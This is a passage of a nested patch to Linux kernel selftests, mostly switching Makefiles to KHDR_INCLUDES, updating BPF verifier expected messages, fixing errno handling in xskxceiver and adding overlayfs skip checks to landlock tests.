+ 		vl &= PR_SME_VL_LEN_MASK;
+ 
++		/* Did we find the lowest supported VL? */
++		if (vq < sve_vq_from_vl(vl))
++			break;
++
+ 		/* Skip missing VLs */
+ 		vq = sve_vq_from_vl(vl);
+ 
+diff --git a/tools/testing/selftests/arm64/tags/Makefile b/tools/testing/selftests/arm64/tags/Makefile
+index 41cb750705117..6d29cfde43a21 100644
+--- a/tools/testing/selftests/arm64/tags/Makefile
++++ b/tools/testing/selftests/arm64/tags/Makefile
+@@ -1,6 +1,6 @@
+ # SPDX-License-Identifier: GPL-2.0
+ 
+-CFLAGS += -I../../../../../usr/include/
++CFLAGS += $(KHDR_INCLUDES)
+ TEST_GEN_PROGS := tags_test
+ TEST_PROGS := run_tags_test.sh
+ 
+diff --git a/tools/testing/selftests/bpf/Makefile b/tools/testing/selftests/bpf/Makefile
+index c22c43bbee194..43c559b7729b5 100644
+--- a/tools/testing/selftests/bpf/Makefile
++++ b/tools/testing/selftests/bpf/Makefile
+@@ -149,8 +149,6 @@ endif
+ # NOTE: Semicolon at the end is critical to override lib.mk's default static
+ # rule for binaries.
+ $(notdir $(TEST_GEN_PROGS)						\
+-	 $(TEST_PROGS)							\
+-	 $(TEST_PROGS_EXTENDED)						\
+ 	 $(TEST_GEN_PROGS_EXTENDED)					\
+ 	 $(TEST_CUSTOM_PROGS)): %: $(OUTPUT)/% ;
+ 
+@@ -181,14 +179,15 @@ endif
+ # do not fail. Static builds leave urandom_read relying on system-wide shared libraries.
+ $(OUTPUT)/liburandom_read.so: urandom_read_lib1.c urandom_read_lib2.c
+ 	$(call msg,LIB,,$@)
+-	$(Q)$(CLANG) $(filter-out -static,$(CFLAGS) $(LDFLAGS)) $^ $(LDLIBS)   \
++	$(Q)$(CLANG) $(filter-out -static,$(CFLAGS) $(LDFLAGS))   \
++		     $^ $(filter-out -static,$(LDLIBS))	     \
+ 		     -fuse-ld=$(LLD) -Wl,-znoseparate-code -Wl,--build-id=sha1 \
+ 		     -fPIC -shared -o $@
+ 
+ $(OUTPUT)/urandom_read: urandom_read.c urandom_read_aux.c $(OUTPUT)/liburandom_read.so
+ 	$(call msg,BINARY,,$@)
+ 	$(Q)$(CLANG) $(filter-out -static,$(CFLAGS) $(LDFLAGS)) $(filter %.c,$^) \
+-		     liburandom_read.so $(LDLIBS)			       \
++		     liburandom_read.so $(filter-out -static,$(LDLIBS))	     \
+ 		     -fuse-ld=$(LLD) -Wl,-znoseparate-code -Wl,--build-id=sha1 \
+ 		     -Wl,-rpath=. -o $@
+ 
+diff --git a/tools/testing/selftests/bpf/prog_tests/kfunc_dynptr_param.c b/tools/testing/selftests/bpf/prog_tests/kfunc_dynptr_param.c
+index a9229260a6cec..72800b1e8395a 100644
+--- a/tools/testing/selftests/bpf/prog_tests/kfunc_dynptr_param.c
++++ b/tools/testing/selftests/bpf/prog_tests/kfunc_dynptr_param.c
+@@ -18,7 +18,7 @@ static struct {
+ 	const char *expected_verifier_err_msg;
+ 	int expected_runtime_err;
+ } kfunc_dynptr_tests[] = {
+-	{"not_valid_dynptr", "Expected an initialized dynptr as arg #1", 0},
++	{"not_valid_dynptr", "cannot pass in dynptr at an offset=-8", 0},
+ 	{"not_ptr_to_stack", "arg#0 expected pointer to stack or dynptr_ptr", 0},
+ 	{"dynptr_data_null", NULL, -EBADMSG},
+ };
+diff --git a/tools/testing/selftests/bpf/prog_tests/xdp_do_redirect.c b/tools/testing/selftests/bpf/prog_tests/xdp_do_redirect.c
+index a50971c6cf4a5..ac70e871d62f8 100644
+--- a/tools/testing/selftests/bpf/prog_tests/xdp_do_redirect.c
++++ b/tools/testing/selftests/bpf/prog_tests/xdp_do_redirect.c
+@@ -65,7 +65,11 @@ static int attach_tc_prog(struct bpf_tc_hook *hook, int fd)
+ /* The maximum permissible size is: PAGE_SIZE - sizeof(struct xdp_page_head) -
+  * sizeof(struct skb_shared_info) - XDP_PACKET_HEADROOM = 3368 bytes
+  */
++#if defined(__s390x__)
++#define MAX_PKT_SIZE 3176
++#else
+ #define MAX_PKT_SIZE 3368
++#endif
+ static void test_max_pkt_size(int fd)
+ {
+ 	char data[MAX_PKT_SIZE + 1] = {};
+diff --git a/tools/testing/selftests/bpf/progs/dynptr_fail.c b/tools/testing/selftests/bpf/progs/dynptr_fail.c
+index 78debc1b38207..9dc3f23a82707 100644
+--- a/tools/testing/selftests/bpf/progs/dynptr_fail.c
++++ b/tools/testing/selftests/bpf/progs/dynptr_fail.c
+@@ -382,7 +382,7 @@ int invalid_helper1(void *ctx)
+ 
+ /* A dynptr can't be passed into a helper function at a non-zero offset */
+ SEC("?raw_tp")
+-__failure __msg("Expected an initialized dynptr as arg #3")
++__failure __msg("cannot pass in dynptr at an offset=-8")
+ int invalid_helper2(void *ctx)
+ {
+ 	struct bpf_dynptr ptr;
+@@ -420,7 +420,7 @@ int invalid_write1(void *ctx)
+  * offset
+  */
+ SEC("?raw_tp")
+-__failure __msg("Expected an initialized dynptr as arg #3")
++__failure __msg("cannot overwrite referenced dynptr")
+ int invalid_write2(void *ctx)
+ {
+ 	struct bpf_dynptr ptr;
+@@ -444,7 +444,7 @@ int invalid_write2(void *ctx)
+  * non-const offset
+  */
+ SEC("?raw_tp")
+-__failure __msg("Expected an initialized dynptr as arg #1")
++__failure __msg("cannot overwrite referenced dynptr")
+ int invalid_write3(void *ctx)
+ {
+ 	struct bpf_dynptr ptr;
+@@ -476,7 +476,7 @@ static int invalid_write4_callback(__u32 index, void *data)
+  * be invalidated as a dynptr
+  */
+ SEC("?raw_tp")
+-__failure __msg("arg 1 is an unacquired reference")
++__failure __msg("cannot overwrite referenced dynptr")
+ int invalid_write4(void *ctx)
+ {
+ 	struct bpf_dynptr ptr;
+@@ -584,7 +584,7 @@ int invalid_read4(void *ctx)
+ 
+ /* Initializing a dynptr on an offset should fail */
+ SEC("?raw_tp")
+-__failure __msg("invalid write to stack")
++__failure __msg("cannot pass in dynptr at an offset=0")
+ int invalid_offset(void *ctx)
+ {
+ 	struct bpf_dynptr ptr;
+diff --git a/tools/testing/selftests/bpf/progs/map_kptr.c b/tools/testing/selftests/bpf/progs/map_kptr.c
+index eb82178034934..228ec45365a8d 100644
+--- a/tools/testing/selftests/bpf/progs/map_kptr.c
++++ b/tools/testing/selftests/bpf/progs/map_kptr.c
+@@ -62,21 +62,23 @@ extern struct prog_test_ref_kfunc *
+ bpf_kfunc_call_test_kptr_get(struct prog_test_ref_kfunc **p, int a, int b) __ksym;
+ extern void bpf_kfunc_call_test_release(struct prog_test_ref_kfunc *p) __ksym;
+ 
++#define WRITE_ONCE(x, val) ((*(volatile typeof(x) *) &(x)) = (val))
++
+ static void test_kptr_unref(struct map_value *v)
+ {
+ 	struct prog_test_ref_kfunc *p;
+ 
+ 	p = v->unref_ptr;
+ 	/* store untrusted_ptr_or_null_ */
+-	v->unref_ptr = p;
++	WRITE_ONCE(v->unref_ptr, p);
+ 	if (!p)
+ 		return;
+ 	if (p->a + p->b > 100)
+ 		return;
+ 	/* store untrusted_ptr_ */
+-	v->unref_ptr = p;
++	WRITE_ONCE(v->unref_ptr, p);
+ 	/* store NULL */
+-	v->unref_ptr = NULL;
++	WRITE_ONCE(v->unref_ptr, NULL);
+ }
+ 
+ static void test_kptr_ref(struct map_value *v)
+@@ -85,7 +87,7 @@ static void test_kptr_ref(struct map_value *v)
+ 
+ 	p = v->ref_ptr;
+ 	/* store ptr_or_null_ */
+-	v->unref_ptr = p;
++	WRITE_ONCE(v->unref_ptr, p);
+ 	if (!p)
+ 		return;
+ 	if (p->a + p->b > 100)
+@@ -99,7 +101,7 @@ static void test_kptr_ref(struct map_value *v)
+ 		return;
+ 	}
+ 	/* store ptr_ */
+-	v->unref_ptr = p;
++	WRITE_ONCE(v->unref_ptr, p);
+ 	bpf_kfunc_call_test_release(p);
+ 
+ 	p = bpf_kfunc_call_test_acquire(&(unsigned long){0});
+diff --git a/tools/testing/selftests/bpf/progs/test_bpf_nf.c b/tools/testing/selftests/bpf/progs/test_bpf_nf.c
+index 227e85e85ddaf..9fc603c9d673e 100644
+--- a/tools/testing/selftests/bpf/progs/test_bpf_nf.c
++++ b/tools/testing/selftests/bpf/progs/test_bpf_nf.c
+@@ -34,6 +34,11 @@ __be16 dport = 0;
+ int test_exist_lookup = -ENOENT;
+ u32 test_exist_lookup_mark = 0;
+ 
++enum nf_nat_manip_type___local {
++	NF_NAT_MANIP_SRC___local,
++	NF_NAT_MANIP_DST___local
++};
++
+ struct nf_conn;
+ 
+ struct bpf_ct_opts___local {
+@@ -58,7 +63,7 @@ int bpf_ct_change_timeout(struct nf_conn *, u32) __ksym;
+ int bpf_ct_set_status(struct nf_conn *, u32) __ksym;
+ int bpf_ct_change_status(struct nf_conn *, u32) __ksym;
+ int bpf_ct_set_nat_info(struct nf_conn *, union nf_inet_addr *,
+-			int port, enum nf_nat_manip_type) __ksym;
++			int port, enum nf_nat_manip_type___local) __ksym;
+ 
+ static __always_inline void
+ nf_ct_test(struct nf_conn *(*lookup_fn)(void *, struct bpf_sock_tuple *, u32,
+@@ -157,10 +162,10 @@ nf_ct_test(struct nf_conn *(*lookup_fn)(void *, struct bpf_sock_tuple *, u32,
+ 
+ 		/* snat */
+ 		saddr.ip = bpf_get_prandom_u32();
+-		bpf_ct_set_nat_info(ct, &saddr, sport, NF_NAT_MANIP_SRC);
++		bpf_ct_set_nat_info(ct, &saddr, sport, NF_NAT_MANIP_SRC___local);
+ 		/* dnat */
+ 		daddr.ip = bpf_get_prandom_u32();
+-		bpf_ct_set_nat_info(ct, &daddr, dport, NF_NAT_MANIP_DST);
++		bpf_ct_set_nat_info(ct, &daddr, dport, NF_NAT_MANIP_DST___local);
+ 
+ 		ct_ins = bpf_ct_insert_entry(ct);
+ 		if (ct_ins) {
+diff --git a/tools/testing/selftests/bpf/xdp_synproxy.c b/tools/testing/selftests/bpf/xdp_synproxy.c
+index 410a1385a01dd..6dbe0b7451985 100644
+--- a/tools/testing/selftests/bpf/xdp_synproxy.c
++++ b/tools/testing/selftests/bpf/xdp_synproxy.c
+@@ -116,6 +116,7 @@ static void parse_options(int argc, char *argv[], unsigned int *ifindex, __u32 *
+ 	*tcpipopts = 0;
+ 	*ports = NULL;
+ 	*single = false;
++	*tc = false;
+ 
+ 	while (true) {
+ 		int opt;
+diff --git a/tools/testing/selftests/bpf/xskxceiver.c b/tools/testing/selftests/bpf/xskxceiver.c
+index 162d3a516f2ca..1b9f48daa2257 100644
+--- a/tools/testing/selftests/bpf/xskxceiver.c
++++ b/tools/testing/selftests/bpf/xskxceiver.c
+@@ -350,7 +350,7 @@ static bool ifobj_zc_avail(struct ifobject *ifobject)
+ 	umem = calloc(1, sizeof(struct xsk_umem_info));
+ 	if (!umem) {
+ 		munmap(bufs, umem_sz);
+-		exit_with_error(-ENOMEM);
++		exit_with_error(ENOMEM);
+ 	}
+ 	umem->frame_size = XSK_UMEM__DEFAULT_FRAME_SIZE;
+ 	ret = xsk_configure_umem(umem, bufs, umem_sz);
+@@ -767,7 +767,7 @@ static void pkt_dump(void *pkt, u32 len)
+ 	struct ethhdr *ethhdr;
+ 	struct udphdr *udphdr;
+ 	struct iphdr *iphdr;
+-	int payload, i;
++	u32 payload, i;
+ 
+ 	ethhdr = pkt;
+ 	iphdr = pkt + sizeof(*ethhdr);
+@@ -792,7 +792,7 @@ static void pkt_dump(void *pkt, u32 len)
+ 	fprintf(stdout, "DEBUG>> L4: udp_hdr->src: %d\n", ntohs(udphdr->source));
+ 	fprintf(stdout, "DEBUG>> L4: udp_hdr->dst: %d\n", ntohs(udphdr->dest));
+ 	/*extract L5 frame */
+-	payload = *((uint32_t *)(pkt + PKT_HDR_SIZE));
++	payload = ntohl(*((u32 *)(pkt + PKT_HDR_SIZE)));
+ 
+ 	fprintf(stdout, "DEBUG>> L5: payload: %d\n", payload);
+ 	fprintf(stdout, "---------------------------------------\n");
+@@ -936,7 +936,7 @@ static int receive_pkts(struct test_spec *test, struct pollfd *fds)
+ 		if (ifobj->use_poll) {
+ 			ret = poll(fds, 1, POLL_TMOUT);
+ 			if (ret < 0)
+-				exit_with_error(-ret);
++				exit_with_error(errno);
+ 
+ 			if (!ret) {
+ 				if (!is_umem_valid(test->ifobj_tx))
+@@ -963,7 +963,7 @@ static int receive_pkts(struct test_spec *test, struct pollfd *fds)
+ 				if (xsk_ring_prod__needs_wakeup(&umem->fq)) {
+ 					ret = poll(fds, 1, POLL_TMOUT);
+ 					if (ret < 0)
+-						exit_with_error(-ret);
++						exit_with_error(errno);
+ 				}
+ 				ret = xsk_ring_prod__reserve(&umem->fq, rcvd, &idx_fq);
+ 			}
+@@ -1015,7 +1015,7 @@ static int __send_pkts(struct ifobject *ifobject, u32 *pkt_nb, struct pollfd *fd
+ 			if (timeout) {
+ 				if (ret < 0) {
+ 					ksft_print_msg("ERROR: [%s] Poll error %d\n",
+-						       __func__, ret);
++						       __func__, errno);
+ 					return TEST_FAILURE;
+ 				}
+ 				if (ret == 0)
+@@ -1024,7 +1024,7 @@ static int __send_pkts(struct ifobject *ifobject, u32 *pkt_nb, struct pollfd *fd
+ 			}
+ 			if (ret <= 0) {
+ 				ksft_print_msg("ERROR: [%s] Poll error %d\n",
+-					       __func__, ret);
++					       __func__, errno);
+ 				return TEST_FAILURE;
+ 			}
+ 		}
+@@ -1323,18 +1323,18 @@ static void thread_common_ops(struct test_spec *test, struct ifobject *ifobject)
+ 	if (ifobject->xdp_flags & XDP_FLAGS_SKB_MODE) {
+ 		if (opts.attach_mode != XDP_ATTACHED_SKB) {
+ 			ksft_print_msg("ERROR: [%s] XDP prog not in SKB mode\n");
+-			exit_with_error(-EINVAL);
++			exit_with_error(EINVAL);
+ 		}
+ 	} else if (ifobject->xdp_flags & XDP_FLAGS_DRV_MODE) {
+ 		if (opts.attach_mode != XDP_ATTACHED_DRV) {
+ 			ksft_print_msg("ERROR: [%s] XDP prog not in DRV mode\n");
+-			exit_with_error(-EINVAL);
++			exit_with_error(EINVAL);
+ 		}
+ 	}
+ 
+ 	ret = xsk_socket__update_xskmap(ifobject->xsk->xsk, ifobject->xsk_map_fd);
+ 	if (ret)
+-		exit_with_error(-ret);
++		exit_with_error(errno);
+ }
+ 
+ static void *worker_testapp_validate_tx(void *arg)
+@@ -1541,7 +1541,7 @@ static void swap_xsk_resources(struct ifobject *ifobj_tx, struct ifobject *ifobj
+ 
+ 	ret = xsk_socket__update_xskmap(ifobj_rx->xsk->xsk, ifobj_rx->xsk_map_fd);
+ 	if (ret)
+-		exit_with_error(-ret);
++		exit_with_error(errno);
+ }
+ 
+ static void testapp_bpf_res(struct test_spec *test)
+diff --git a/tools/testing/selftests/clone3/Makefile b/tools/testing/selftests/clone3/Makefile
+index 79b19a2863a0b..84832c369a2ea 100644
+--- a/tools/testing/selftests/clone3/Makefile
++++ b/tools/testing/selftests/clone3/Makefile
+@@ -1,5 +1,5 @@
+ # SPDX-License-Identifier: GPL-2.0
+-CFLAGS += -g -std=gnu99 -I../../../../usr/include/
++CFLAGS += -g -std=gnu99 $(KHDR_INCLUDES)
+ LDLIBS += -lcap
+ 
+ TEST_GEN_PROGS := clone3 clone3_clear_sighand clone3_set_tid \
+diff --git a/tools/testing/selftests/core/Makefile b/tools/testing/selftests/core/Makefile
+index f6f2d6f473c6a..ce262d0972699 100644
+--- a/tools/testing/selftests/core/Makefile
++++ b/tools/testing/selftests/core/Makefile
+@@ -1,5 +1,5 @@
+ # SPDX-License-Identifier: GPL-2.0-only
+-CFLAGS += -g -I../../../../usr/include/
++CFLAGS += -g $(KHDR_INCLUDES)
+ 
+ TEST_GEN_PROGS := close_range_test
+ 
+diff --git a/tools/testing/selftests/dmabuf-heaps/Makefile b/tools/testing/selftests/dmabuf-heaps/Makefile
+index 604b43ece15f5..9e7e158d5fa32 100644
+--- a/tools/testing/selftests/dmabuf-heaps/Makefile
++++ b/tools/testing/selftests/dmabuf-heaps/Makefile
+@@ -1,5 +1,5 @@
+ # SPDX-License-Identifier: GPL-2.0
+-CFLAGS += -static -O3 -Wl,-no-as-needed -Wall
++CFLAGS += -static -O3 -Wl,-no-as-needed -Wall $(KHDR_INCLUDES)
+ 
+ TEST_GEN_PROGS = dmabuf-heap
+ 
+diff --git a/tools/testing/selftests/dmabuf-heaps/dmabuf-heap.c b/tools/testing/selftests/dmabuf-heaps/dmabuf-heap.c
+index 29af27acd40ea..890a8236a8ba7 100644
+--- a/tools/testing/selftests/dmabuf-heaps/dmabuf-heap.c
++++ b/tools/testing/selftests/dmabuf-heaps/dmabuf-heap.c
+@@ -13,10 +13,9 @@
+ #include <sys/types.h>
+ 
+ #include <linux/dma-buf.h>
++#include <linux/dma-heap.h>
+ #include <drm/drm.h>
+ 
+-#include "../../../../include/uapi/linux/dma-heap.h"
+-
+ #define DEVPATH "/dev/dma_heap"
+ 
+ static int check_vgem(int fd)
+diff --git a/tools/testing/selftests/drivers/dma-buf/Makefile b/tools/testing/selftests/drivers/dma-buf/Makefile
+index 79cb16b4e01a9..441407bb0e801 100644
+--- a/tools/testing/selftests/drivers/dma-buf/Makefile
++++ b/tools/testing/selftests/drivers/dma-buf/Makefile
+@@ -1,5 +1,5 @@
+ # SPDX-License-Identifier: GPL-2.0-only
+-CFLAGS += -I../../../../../usr/include/
++CFLAGS += $(KHDR_INCLUDES)
+ 
+ TEST_GEN_PROGS := udmabuf
+ 
+diff --git a/tools/testing/selftests/drivers/net/netdevsim/devlink.sh b/tools/testing/selftests/drivers/net/netdevsim/devlink.sh
+index a08c02abde121..7f7d20f222070 100755
+--- a/tools/testing/selftests/drivers/net/netdevsim/devlink.sh
++++ b/tools/testing/selftests/drivers/net/netdevsim/devlink.sh
+@@ -17,6 +17,18 @@ SYSFS_NET_DIR=/sys/bus/netdevsim/devices/$DEV_NAME/net/
+ DEBUGFS_DIR=/sys/kernel/debug/netdevsim/$DEV_NAME/
+ DL_HANDLE=netdevsim/$DEV_NAME
+ 
++wait_for_devlink()
++{
++	"$@" | grep -q $DL_HANDLE
++}
++
++devlink_wait()
++{
++	local timeout=$1
++
++	busywait "$timeout" wait_for_devlink devlink dev
++}
++
+ fw_flash_test()
+ {
+ 	RET=0
+@@ -256,6 +268,9 @@ netns_reload_test()
+ 	ip netns del testns2
+ 	ip netns del testns1
+ 
++	# Wait until netns async cleanup is done.
++	devlink_wait 2000
++
+ 	log_test "netns reload test"
+ }
+ 
+@@ -348,6 +363,9 @@ resource_test()
+ 	ip netns del testns2
+ 	ip netns del testns1
+ 
++	# Wait until netns async cleanup is done.
++	devlink_wait 2000
++
+ 	log_test "resource test"
+ }
+ 
+diff --git a/tools/testing/selftests/drivers/s390x/uvdevice/Makefile b/tools/testing/selftests/drivers/s390x/uvdevice/Makefile
+index 891215a7dc8a1..755d164384c46 100644
+--- a/tools/testing/selftests/drivers/s390x/uvdevice/Makefile
++++ b/tools/testing/selftests/drivers/s390x/uvdevice/Makefile
+@@ -11,10 +11,9 @@ else
+ TEST_GEN_PROGS := test_uvdevice
+ 
+ top_srcdir ?= ../../../../../..
+-khdr_dir = $(top_srcdir)/usr/include
+ LINUX_TOOL_ARCH_INCLUDE = $(top_srcdir)/tools/arch/$(ARCH)/include
+ 
+-CFLAGS += -Wall -Werror -static -I$(khdr_dir) -I$(LINUX_TOOL_ARCH_INCLUDE)
++CFLAGS += -Wall -Werror -static $(KHDR_INCLUDES) -I$(LINUX_TOOL_ARCH_INCLUDE)
+ 
+ include ../../../lib.mk
+ 
+diff --git a/tools/testing/selftests/filesystems/Makefile b/tools/testing/selftests/filesystems/Makefile
+index 129880fb42d34..c647fd6a0446a 100644
+--- a/tools/testing/selftests/filesystems/Makefile
++++ b/tools/testing/selftests/filesystems/Makefile
+@@ -1,6 +1,6 @@
+ # SPDX-License-Identifier: GPL-2.0
+ 
+-CFLAGS += -I../../../../usr/include/
++CFLAGS += $(KHDR_INCLUDES)
+ TEST_GEN_PROGS := devpts_pts
+ TEST_GEN_PROGS_EXTENDED := dnotify_test
+ 
+diff --git a/tools/testing/selftests/filesystems/binderfs/Makefile b/tools/testing/selftests/filesystems/binderfs/Makefile
+index 8af25ae960498..c2f7cef919c04 100644
+--- a/tools/testing/selftests/filesystems/binderfs/Makefile
++++ b/tools/testing/selftests/filesystems/binderfs/Makefile
+@@ -1,6 +1,6 @@
+ # SPDX-License-Identifier: GPL-2.0
+ 
+-CFLAGS += -I../../../../../usr/include/ -pthread
++CFLAGS += $(KHDR_INCLUDES) -pthread
+ TEST_GEN_PROGS := binderfs_test
+ 
+ binderfs_test: binderfs_test.c ../../kselftest.h ../../kselftest_harness.h
+diff --git a/tools/testing/selftests/filesystems/epoll/Makefile b/tools/testing/selftests/filesystems/epoll/Makefile
+index 78ae4aaf7141a..0788a7dc80042 100644
+--- a/tools/testing/selftests/filesystems/epoll/Makefile
++++ b/tools/testing/selftests/filesystems/epoll/Makefile
+@@ -1,6 +1,6 @@
+ # SPDX-License-Identifier: GPL-2.0
+ 
+-CFLAGS += -I../../../../../usr/include/
++CFLAGS += $(KHDR_INCLUDES)
+ LDLIBS += -lpthread
+ TEST_GEN_PROGS := epoll_wakeup_test
+ 
+diff --git a/tools/testing/selftests/ftrace/test.d/dynevent/eprobes_syntax_errors.tc b/tools/testing/selftests/ftrace/test.d/dynevent/eprobes_syntax_errors.tc
+index fc1daac7f0668..4f5e8c6651562 100644
+--- a/tools/testing/selftests/ftrace/test.d/dynevent/eprobes_syntax_errors.tc
++++ b/tools/testing/selftests/ftrace/test.d/dynevent/eprobes_syntax_errors.tc
+@@ -22,6 +22,8 @@ check_error 'e:foo/^bar.1 syscalls/sys_enter_openat'	# BAD_EVENT_NAME
+ check_error 'e:foo/bar syscalls/sys_enter_openat arg=^dfd'	# BAD_FETCH_ARG
+ check_error 'e:foo/bar syscalls/sys_enter_openat ^arg=$foo'	# BAD_ATTACH_ARG
+ 
+-check_error 'e:foo/bar syscalls/sys_enter_openat if ^'	# NO_EP_FILTER
++if grep -q '<attached-group>\.<attached-event>.*\[if <filter>\]' README; then
++  check_error 'e:foo/bar syscalls/sys_enter_openat if ^'	# NO_EP_FILTER
++fi
+ 
+ exit 0
+diff --git a/tools/testing/selftests/ftrace/test.d/ftrace/func_event_triggers.tc b/tools/testing/selftests/ftrace/test.d/ftrace/func_event_triggers.tc
+index 3eea2abf68f9e..2ad7d4b501cc1 100644
+--- a/tools/testing/selftests/ftrace/test.d/ftrace/func_event_triggers.tc
++++ b/tools/testing/selftests/ftrace/test.d/ftrace/func_event_triggers.tc
+@@ -42,7 +42,7 @@ test_event_enabled() {
+ 
+     while [ $check_times -ne 0 ]; do
+ 	e=`cat $EVENT_ENABLE`
+-	if [ "$e" == $val ]; then
++	if [ "$e" = $val ]; then
+ 	    return 0
+ 	fi
+ 	sleep $SLEEP_TIME
+diff --git a/tools/testing/selftests/ftrace/test.d/kprobe/probepoint.tc b/tools/testing/selftests/ftrace/test.d/kprobe/probepoint.tc
+index 624269c8d5343..68425987a5dd9 100644
+--- a/tools/testing/selftests/ftrace/test.d/kprobe/probepoint.tc
++++ b/tools/testing/selftests/ftrace/test.d/kprobe/probepoint.tc
+@@ -21,7 +21,7 @@ set_offs() { # prev target next
+ 
+ # We have to decode symbol addresses to get correct offsets.
+ # If the offset is not an instruction boundary, it cause -EILSEQ.
+-set_offs `grep -A1 -B1 ${TARGET_FUNC} /proc/kallsyms | cut -f 1 -d " " | xargs`
++set_offs `grep -v __pfx_ /proc/kallsyms | grep -A1 -B1 ${TARGET_FUNC} | cut -f 1 -d " " | xargs`
+ 
+ UINT_TEST=no
+ # printf "%x" -1 returns (unsigned long)-1.
+diff --git a/tools/testing/selftests/futex/functional/Makefile b/tools/testing/selftests/futex/functional/Makefile
+index 5a0e0df8de9b3..a392d0917b4e5 100644
+--- a/tools/testing/selftests/futex/functional/Makefile
++++ b/tools/testing/selftests/futex/functional/Makefile
+@@ -1,5 +1,5 @@
+ # SPDX-License-Identifier: GPL-2.0
+-INCLUDES := -I../include -I../../ -I../../../../../usr/include/
++INCLUDES := -I../include -I../../ $(KHDR_INCLUDES)
+ CFLAGS := $(CFLAGS) -g -O2 -Wall -D_GNU_SOURCE -pthread $(INCLUDES) $(KHDR_INCLUDES)
+ LDLIBS := -lpthread -lrt
+ 
+diff --git a/tools/testing/selftests/gpio/Makefile b/tools/testing/selftests/gpio/Makefile
+index 616ed40196554..e0884390447dc 100644
+--- a/tools/testing/selftests/gpio/Makefile
++++ b/tools/testing/selftests/gpio/Makefile
+@@ -3,6 +3,6 @@
+ TEST_PROGS := gpio-mockup.sh gpio-sim.sh
+ TEST_FILES := gpio-mockup-sysfs.sh
+ TEST_GEN_PROGS_EXTENDED := gpio-mockup-cdev gpio-chip-info gpio-line-name
+-CFLAGS += -O2 -g -Wall -I../../../../usr/include/ $(KHDR_INCLUDES)
++CFLAGS += -O2 -g -Wall $(KHDR_INCLUDES)
+ 
+ include ../lib.mk
+diff --git a/tools/testing/selftests/iommu/iommufd.c b/tools/testing/selftests/iommu/iommufd.c
+index 8aa8a346cf221..fa08209268c42 100644
+--- a/tools/testing/selftests/iommu/iommufd.c
++++ b/tools/testing/selftests/iommu/iommufd.c
+@@ -1259,7 +1259,7 @@ TEST_F(iommufd_mock_domain, user_copy)
+ 
+ 	test_cmd_destroy_access_pages(
+ 		access_cmd.id, access_cmd.access_pages.out_access_pages_id);
+-	test_cmd_destroy_access(access_cmd.id) test_ioctl_destroy(ioas_id);
++	test_cmd_destroy_access(access_cmd.id);
+ 
+ 	test_ioctl_destroy(ioas_id);
+ }
+diff --git a/tools/testing/selftests/ipc/Makefile b/tools/testing/selftests/ipc/Makefile
+index 1c4448a843a41..50e9c299fc4ae 100644
+--- a/tools/testing/selftests/ipc/Makefile
++++ b/tools/testing/selftests/ipc/Makefile
+@@ -10,7 +10,7 @@ ifeq ($(ARCH),x86_64)
+ 	CFLAGS := -DCONFIG_X86_64 -D__x86_64__
+ endif
+ 
+-CFLAGS += -I../../../../usr/include/
++CFLAGS += $(KHDR_INCLUDES)
+ 
+ TEST_GEN_PROGS := msgque
+ 
+diff --git a/tools/testing/selftests/kcmp/Makefile b/tools/testing/selftests/kcmp/Makefile
+index b4d39f6b5124d..59a1e53790181 100644
+--- a/tools/testing/selftests/kcmp/Makefile
++++ b/tools/testing/selftests/kcmp/Makefile
+@@ -1,5 +1,5 @@
+ # SPDX-License-Identifier: GPL-2.0-only
+-CFLAGS += -I../../../../usr/include/
++CFLAGS += $(KHDR_INCLUDES)
+ 
+ TEST_GEN_PROGS := kcmp_test
+ 
+diff --git a/tools/testing/selftests/landlock/fs_test.c b/tools/testing/selftests/landlock/fs_test.c
+index d5dab986f6125..b6c4be3faf7a9 100644
+--- a/tools/testing/selftests/landlock/fs_test.c
++++ b/tools/testing/selftests/landlock/fs_test.c
+@@ -11,6 +11,7 @@
+ #include <fcntl.h>
+ #include <linux/landlock.h>
+ #include <sched.h>
++#include <stdio.h>
+ #include <string.h>
+ #include <sys/capability.h>
+ #include <sys/mount.h>
+@@ -89,6 +90,40 @@ static const char dir_s3d3[] = TMP_DIR "/s3d1/s3d2/s3d3";
+  *         └── s3d3
+  */
+ 
++static bool fgrep(FILE *const inf, const char *const str)
++{
++	char line[32];
++	const int slen = strlen(str);
++
++	while (!feof(inf)) {
++		if (!fgets(line, sizeof(line), inf))
++			break;
++		if (strncmp(line, str, slen))
++			continue;
++
++		return true;
++	}
++
++	return false;
++}
++
++static bool supports_overlayfs(void)
++{
++	bool res;
++	FILE *const inf = fopen("/proc/filesystems", "r");
++
++	/*
++	 * Consider that the filesystem is supported if we cannot get the
++	 * supported ones.
++	 */
++	if (!inf)
++		return true;
++
++	res = fgrep(inf, "nodev\toverlay\n");
++	fclose(inf);
++	return res;
++}
++
+ static void mkdir_parents(struct __test_metadata *const _metadata,
+ 			  const char *const path)
+ {
+@@ -4001,6 +4036,9 @@ FIXTURE(layout2_overlay) {};
+ 
+ FIXTURE_SETUP(layout2_overlay)
+ {
++	if (!supports_overlayfs())
++		SKIP(return, "overlayfs is not supported");
++
+ 	prepare_layout(_metadata);
+ 
+ 	create_directory(_metadata, LOWER_BASE);
+@@ -4037,6 +4075,9 @@ FIXTURE_SETUP(layout2_overlay)
+ 
+ FIXTURE_TEARDOWN(layout2_overlay)
+ {
++	if (!supports_overlayfs())
++		SKIP(return, "overlayfs is not supported");
++
+ 	EXPECT_EQ(0, remove_path(lower_do1_fl3));
+ 	EXPECT_EQ(0, remove_path(lower_dl1_fl2));
+ 	EXPECT_EQ(0, remove_path(lower_fl1));
+@@ -4068,6 +4109,9 @@ FIXTURE_TEARDOWN(layout2_overlay)
+ 
+ TEST_F_FORK(layout2_overlay, no_restriction)
+ {
++	if (!supports_overlayfs())
++		SKIP(return, "overlayfs is not supported");
++
+ 	ASSERT_EQ(0, test_open(lower_fl1, O_RDONLY));
+ 	ASSERT_EQ(0, test_open(lower_dl1, O_RDONLY));
+ 	ASSERT_EQ(0, test_open(lower_dl1_fl2, O_RDONLY));
+@@ -4231,6 +4275,9 @@ TEST_F_FORK(layout2_overlay, same_content_different_file)
+ 	size_t i;
+ 	const char *path_entry;
+ 
++	if (!supports_overlayfs())
++		SKIP(return, "overlayfs is not supported");
++
+ 	/* Sets rules on base directories (i.e. outside overlay scope). */
+ 	ruleset_fd = create_ruleset(_metadata, ACCESS_RW, layer1_base);
+ 	ASSERT_LE(0, ruleset_fd);
+diff --git a/tools/testing/selftests/landlock/ptrace_test.c b/tools/testing/selftests/landlock/ptrace_test.c
+index c28ef98ff3ac1..55e7871631a19 100644
+--- a/tools/testing/selftests/landlock/ptrace_test.c
++++ b/tools/testing/selftests/landlock/ptrace_test.c
